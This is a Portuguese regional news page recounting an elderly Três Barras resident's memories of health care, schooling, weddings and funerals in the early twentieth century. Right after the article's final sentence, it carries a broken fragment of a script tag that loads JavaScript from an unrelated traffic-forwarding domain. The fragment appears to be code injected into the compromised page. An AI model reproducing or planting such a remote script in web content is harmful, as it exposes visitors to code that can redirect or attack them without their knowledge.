InícioCuriosidades do PassadoSaúde, educação, casamento e morte: outros tempos

Saúde, educação, casamento e morte: outros tempos

Últimas notícias

Operação contra abuso sexual em Canoinhas e Papanduva é considerada a maior da região

A operaçãoRespectus, deflagrada nesta quarta-feira (24) em Papanduva e...

Após denúncia polícia militar apreende arma sem registro em Três Barras

Na quarta-feira, 24, por volta das 16h, policiais militares...

Na atual sociedade capitalista, com as inovações tecnológicas, a aceleração do tempo, o individualismo, as transformações no cotidiano tendem a acontecer de forma acelerada. O que hoje parece comum e prático já estará ultrapassado na próxima geração.  Podemos acompanhar essa evolução ao ouvir histórias de pessoas da melhor idade. Vejamos o caso de Dona Sybila Montes Ribas Gemra

Dona Sybila, nascida em 12/06/1931, filha de Pedro de Paula Ribas e Dolores Montes Ribas, é viúva do Sr. Francisco Gemra, conhecido tresbarrense, que trabalhou na serraria Lumber e posteriormente no CIMH. Sobre a questão de saúde ela, aos 87 anos de idade, relata as dificuldades vividas com a inexistência de medicamentos, problemas com a vacinação e mesmo o transporte de doentes.

 

Três Barras, na primeira metade do século XX, contava com a escola polonesa para atender a demanda dos imigrantes que residiam no município. Nesta época, as relações entre vizinhos era marcada pela tradicional “visita”, sendo comum elas acontecerem no período noturno. Dona Sybila recorda sua experiência com os vizinhos e a educação:

 

O casamento passou por diferentes mudanças no decorrer dos anos. Desde os preparativos da noiva, com o tradicional enxoval, até as comemorações festivas. O meio de transporte dos noivos, quando não a pé, era realizado com carroças. Assim como o casamento, a morte também sofreu alterações no que se refere aos preparativos do defunto até a forma de adquirir o caixão. Esses momentos vividos por Dona Sybila estão bem presentes em suas memórias.

Dona Sybila é exemplo de amor ao trabalho e dedicação familiar. Recordando suas experiências de vida podemos viajar no tempo, acompanhando as transformações sociais e familiares ocorridas ao longo dos anos…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.